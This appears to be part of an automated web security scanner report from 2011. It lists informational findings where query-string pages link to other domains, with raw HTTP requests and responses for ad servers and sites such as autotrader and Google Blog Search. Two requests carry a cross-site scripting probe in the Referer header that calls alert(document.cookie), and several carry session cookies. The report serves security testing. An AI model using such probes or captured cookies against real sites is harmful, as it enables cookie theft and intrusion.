Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.snowmobiletraderonline.com/">here</a>
...[SNIP]...

20.9. http://ads.traderonline.com/RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/486817688/Right1/TOLMedia/House-TOL-Sky/atol-120x600.jpg/72634857383030396f616f4141783156 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.traderonline.com
Path:	/RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/486817688/Right1/TOLMedia/House-TOL-Sky/atol-120x600.jpg/72634857383030396f616f4141783156

Issue detail

The page was loaded from a URL containing a query string:

http://ads.traderonline.com/RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/486817688/Right1/TOLMedia/House-TOL-Sky/atol-120x600.jpg/72634857383030396f616f4141783156?x

The response contains the following link to another domain:

http://www.aerotraderonline.com/

Request

GET /RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/486817688/Right1/TOLMedia/House-TOL-Sky/atol-120x600.jpg/72634857383030396f616f4141783156?x HTTP/1.1
Host: ads.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884751287%7C1298476751287%3B%20s_lv%3D1295884751289%7C1390492751289%3B%20s_lv_s%3DFirst%2520Visit%7C1295886551289%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.1.10.1295884751;

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 22:29:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.aerotraderonline.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.aerotraderonline.com/">here</a>.</p>
...[SNIP]...

20.10. http://ads.tweetmeme.com/serve.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.tweetmeme.com
Path:	/serve.js

Issue detail

The page was loaded from a URL containing a query string:

http://ads.tweetmeme.com/serve.js?tag=home_leaderboard_iframe&width=728&height=90&rand=99954773672

The response contains the following link to another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /serve.js?tag=home_leaderboard_iframe&width=728&height=90&rand=99954773672 HTTP/1.1
Host: ads.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 22:20:53 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
Cache-Control: no-cache, must-revalidate
Expires: Sat, 20 Jul 2000 08:00:00 GMT
Pragma: no-cache
X-Served-By: h03
Content-Length: 9228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>TweetMeme Advert
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

20.11. http://ads.tweetmeme.com/serve.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.tweetmeme.com
Path:	/serve.js

Issue detail

The page was loaded from a URL containing a query string:

http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=600&rand=26297691596

The response contains the following link to another domain:

http://static.fmpub.net/zone/2673

Request

GET /serve.js?tag=home&width=300&height=600&rand=26297691596 HTTP/1.1
Host: ads.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 22:20:54 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
Cache-Control: no-cache, must-revalidate
Expires: Sat, 20 Jul 2000 08:00:00 GMT
Pragma: no-cache
X-Served-By: h01
Content-Length: 9103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>TweetMeme Advert
...[SNIP]...
<script type='text/javascript' src='http://static.fmpub.net/zone/2673'></script>
...[SNIP]...

20.12. http://ads.tweetmeme.com/serve.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.tweetmeme.com
Path:	/serve.js

Issue detail

The page was loaded from a URL containing a query string:

http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=53705905654

The response contains the following link to another domain:

http://static.fmpub.net/zone/2671

Request

GET /serve.js?tag=home&width=300&height=250&rand=53705905654 HTTP/1.1
Host: ads.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 22:20:54 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
Cache-Control: no-cache, must-revalidate
Expires: Sat, 20 Jul 2000 08:00:00 GMT
Pragma: no-cache
X-Served-By: ded2059
Content-Length: 9103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>TweetMeme Advert
...[SNIP]...
<script type='text/javascript' src='http://static.fmpub.net/zone/2671'></script>
...[SNIP]...

20.13. http://adserver.teracent.net/tase/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The page was loaded from a URL containing a query string:

http://adserver.teracent.net/tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect=

The response contains the following links to other domains:

http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID,095352382072745203,TIMEID,1295921986&Redirect=http:/adserver.teracent.net/tase/redir/1295921988188_58040565_as2108_imp?q=H4sIAAAAAAAAAFWQP2vDMBDFv8qdTn9d0VVTbFLoEozoUugUcGwlGVXXDk6InbnfunJITTsI3nv3051O7PtzO-zsBkizdICURrl6OKU4Kfp1mmviizPaKLmQUhoh9V9n-OJAc1hIMAa5LN3OoouNTUkimCCQklzYzUGaA9qYRLrqNAdM3kNFym2rMNgNS6M5B1wlYRgB3QUQmPJBACMUqe8K5rIiugtUIEo39P-neG5QIFfcx11ijB-ulRurQ2cJATyCJ-EBPdMeTSqEo11PdRjjrXfBUlpVCFBaInI33A42NmEKdey72lWWDHexDbYdL66pR3sOoXrK89gX_dR8jV07Du2luHUhT0RG6Sc0otEZlxzSaiIbs6q1m9f124v_eC-fH_f3-30RpuMUYtFO1_w8nM7ze7r6B_vAZTPRAQAA
http://pcdn.tcgmsrv.net/tase/images/toyota-inmarket/toyota_static_300.jpg
http://pcdn.tcgmsrv.net/tase/js/swfobject-2.2.js

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295921988188_58040565_as2108_imp|285#1295921988188_58040565_as2108_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 02:19:48 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 02:19:47 GMT
Content-Length: 18077

<!DOCTYPE html>

<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
<div id="noscript" style="height:250px;left:0;position:absolute;top:0;width:300px;z-index:10;">
<a href="http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect=http://adserver.teracent.net/tase/redir/1295921988188_58040565_as2108_imp?q=H4sIAAAAAAAAAFWQP2vDMBDFv8qdTn9d0VVTbFLoEozoUugUcGwlGVXXDk6InbnfunJITTsI3nv3051O7PtzO-zsBkizdICURrl6OKU4Kfp1mmviizPaKLmQUhoh9V9n-OJAc1hIMAa5LN3OoouNTUkimCCQklzYzUGaA9qYRLrqNAdM3kNFym2rMNgNS6M5B1wlYRgB3QUQmPJBACMUqe8K5rIiugtUIEo39P-neG5QIFfcx11ijB-ulRurQ2cJATyCJ-EBPdMeTSqEo11PdRjjrXfBUlpVCFBaInI33A42NmEKdey72lWWDHexDbYdL66pR3sOoXrK89gX_dR8jV07Du2luHUhT0RG6Sc0otEZlxzSaiIbs6q1m9f124v_eC-fH_f3-30RpuMUYtFO1_w8nM7ze7r6B_vAZTPRAQAA" target="_blank">
<img src="http://pcdn.tcgmsrv.net/tase/images/toyota-inmarket/toyota_static_300.jpg"
alt="" border="0" height="250" width="300"/>
</a>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://pcdn.tcgmsrv.net/tase/js/swfobject-2.2.js"></script>
...[SNIP]...

20.14. http://adserver.teracent.net/tase/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The page was loaded from a URL containing a query string:

http://adserver.teracent.net/tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect=

The response contains the following links to other domains:

http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID,095352382072745203,TIMEID,1295921986&Redirect=http:/adserver.teracent.net/tase/redir/1295929607476_58474564_as2108_imp?q=H4sIAAAAAAAAAFVQy2rDMBD8lZV29XJFrzrFbgq9GCN6KfRUcGwlOQrXDk6IHXrsX1cJqWkPgpnZ0c7uPn2XX-PGloCapweoNJOrO1OKUC9Mk0bCX2a0UXKpSWmEMn8Yl7Qw0ASLE4zUQlZuY5mLrU1KcnCBICW6sLkKKUcrJoVUrj5cBS5vokLlPuow2pKnaCJgqwQMT7PcACCj6u4AjkykvqsE0lKIN8AUiMqNw_8UT0ZIQUr4uEke48dz7aZ611tkAJ6BR-GBea49M6kQ9nY9N2GKl8EFi8KQEKC0ZIzceNnZ2IY5NHHoG1dbNORiF2w3nVzbTPYYQv2Q53Eohrn9nPpuGrtTcelDnhwZpktoxozOSBIYjiKbsrqz5cv69dm_v1WP9__b7bYI834Osejmc34cD8frPH3zAx-qqcfRAQAA
http://pcdn.tcgmsrv.net/tase/images/toyota-inmarket/toyota_static_300.jpg
http://pcdn.tcgmsrv.net/tase/js/swfobject-2.2.js

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929607476_58474564_as2108_imp|285#1295929607476_58474564_as2108_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:26:47 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:26:47 GMT
Content-Length: 18162

<!DOCTYPE html>

<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
<div id="noscript" style="height:250px;left:0;position:absolute;top:0;width:300px;z-index:10;">
<a href="http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect=http://adserver.teracent.net/tase/redir/1295929607476_58474564_as2108_imp?q=H4sIAAAAAAAAAFVQy2rDMBD8lZV29XJFrzrFbgq9GCN6KfRUcGwlOQrXDk6IHXrsX1cJqWkPgpnZ0c7uPn2XX-PGloCapweoNJOrO1OKUC9Mk0bCX2a0UXKpSWmEMn8Yl7Qw0ASLE4zUQlZuY5mLrU1KcnCBICW6sLkKKUcrJoVUrj5cBS5vokLlPuow2pKnaCJgqwQMT7PcACCj6u4AjkykvqsE0lKIN8AUiMqNw_8UT0ZIQUr4uEke48dz7aZ611tkAJ6BR-GBea49M6kQ9nY9N2GKl8EFi8KQEKC0ZIzceNnZ2IY5NHHoG1dbNORiF2w3nVzbTPYYQv2Q53Eohrn9nPpuGrtTcelDnhwZpktoxozOSBIYjiKbsrqz5cv69dm_v1WP9__b7bYI834Osejmc34cD8frPH3zAx-qqcfRAQAA" target="_blank">
<img src="http://pcdn.tcgmsrv.net/tase/images/toyota-inmarket/toyota_static_300.jpg"
alt="" border="0" height="250" width="300"/>
</a>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://pcdn.tcgmsrv.net/tase/js/swfobject-2.2.js"></script>
...[SNIP]...

20.15. http://autotrader.dealix.com/step1.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://autotrader.dealix.com
Path:	/step1.asp

Issue detail

The page was loaded from a URL containing a query string:

http://autotrader.dealix.com/step1.asp?refid\\x3d88888\\x26amp;detid\\x3d20000\\x22

The response contains the following links to other domains:

http://an.tacoda.net/an/12124/slf.js
http://www.intellichoice.com/
http://www.invoicedealers.com/

Request

GET /step1.asp?refid\\x3d88888\\x26amp;detid\\x3d20000\\x22 HTTP/1.1
Host: autotrader.dealix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 15:02:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 12107
Content-Type: text/html
Set-Cookie: CkSE=1%2F24%2F2011+7%3A32%3A47+AM; path=/
Set-Cookie: CkSN=21028798456; path=/
Set-Cookie: CkUN=21028798456; expires=Thu, 21-Jan-2021 08:00:00 GMT; path=/
Cache-control: private



<html>
<head>

<title>Car Buying Service: New Car Buying Made Easy - Buy a car online at InvoiceDealers</title>
<meta name="description" content="InvoiceDe
...[SNIP]...
<br><a href="http://www.invoicedealers.com">Invoice Dealers - New Car Prices and Information</a>
...[SNIP]...
</a>  |  Vehicle Data Provided by <a href="http://www.intellichoice.com" target="_blank"><span style="font-size:8pt; font-family:Arial, Helvetica, sans-serif;font-weight:normal; text-Decoration:underline;">
...[SNIP]...
</SCRIPT><SCRIPT SRC="http://an.tacoda.net/an/12124/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...

20.16. https://billing.cloudaccess.net/cart.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://billing.cloudaccess.net
Path:	/cart.php

Issue detail

The page was loaded from a URL containing a query string:

https://billing.cloudaccess.net/cart.php?a=add&pid=41

The response contains the following link to another domain:

https://fonts.googleapis.com/css?family=Cantarell

Request

Response

20.17. https://billing.cloudaccess.net/submitticket.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://billing.cloudaccess.net
Path:	/submitticket.php

Issue detail

The page was loaded from a URL containing a query string:

https://billing.cloudaccess.net/submitticket.php?step=2&deptid=14

The response contains the following link to another domain:

https://fonts.googleapis.com/css?family=Cantarell

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:57:33 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5699
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<link rel="stylesheet" type="text/css" href="templates/my_cloud_panel_2_0/cloudaccess.css" />
<link href='https://fonts.googleapis.com/css?family=Cantarell' rel='stylesheet' type='text/css'>
<!--[if IE 7]>
...[SNIP]...

20.18. http://blogsearch.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogsearch.google.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://blogsearch.google.com/?hl=en&tab=wb

The response contains the following links to other domains:

http://lh3.googleusercontent.com/public/DuDM0CT123W36igs4zJepftyh8RldEFYrOK6Oc6P6pNmWEY--A2PC4qLe_7N3_kYD9TYNw0NMGZZbFMxu46J1W5ca01aZWDehXvsCSuEE_ta5UFMcZkwYwSMPt-EZkMjjoWgpfxa8o8UB7erdODMEOknKRfhsPvdte-SJw
http://lh4.googleusercontent.com/public/A43LCN0NDvgM4wAqrRNRm7dKS_SD0o5ql9xU0fDputQ5OEsA5hgN5NRU53RIt6INrrdrlo9zECwkVvw7Nkl4JgvJ3h9xyiqcT_G6KEHnQgld05O076YZam2nTMV-3225j1lbmtL8jPAaUUEcsncbPwEKKldJZ3CIlzVaQq4RBarCMcdoTD0ucg
http://lh5.googleusercontent.com/public/n9GoxfDAW1w4hdTScCr4NoTYH2s1_68Ko11sakGJEBUq5ciNC0-6QyP-zDqHtyz6OPCoWaF-CdajDKf8CQeWkQJn71lq6mX9cIIXHwLdZFP96qeoRdIPvNh3vAe98TI_Bfre-od7gkNXpavXYzCGPv6w74yX4A
http://lh6.googleusercontent.com/public/1QOVqIRs_50A1jAPmksVqpEMSa7pnU0uJdjBNcd5_U3AJRVEybPcHWW8pSBc3sLiRRhDGXmT-nEM3DOrutmTaCR1XxjTSKxuALWVqz1AVlMN5xcj_EILpYIw4Q2etSFFZ7vYxNDM1gzY8FCDdW4
http://lh6.googleusercontent.com/public/nxFKhPHGNDUck_cr0eQYa_fkGp-TFkxb_VBRbdz_Rr0sygdCPIpjKJy5ll-I1nzdWT_Qfy-yBOfKyN2xo8-Ax8V22mq4xZDD0NHR9Z-g2V_8DqjE3oiA7DZUZKxAShbdhZjSu4Gan_L7yDJbrjegpixyMkIwFqf_d475A6QEi8cDqvNlDkqwsherAY08iLbZ
http://www.youtube.com/?hl=en&tab=b1

Request

GET /?hl=en&tab=wb HTTP/1.1
Host: blogsearch.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:01:51 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=61feb9895a73eea8:TM=1295881311:LM=1295881311:S=tbJ-LB1azrxkxKuj; expires=Wed, 23-Jan-2013 15:01:51 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: bsfe
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta HTTP-EQUIV="content-type" content="text/html; charset=UTF-8"><meta description="Google Blog Search provides fresh, relevant search results from millions of feed-enabled blogs. Users
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=b1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
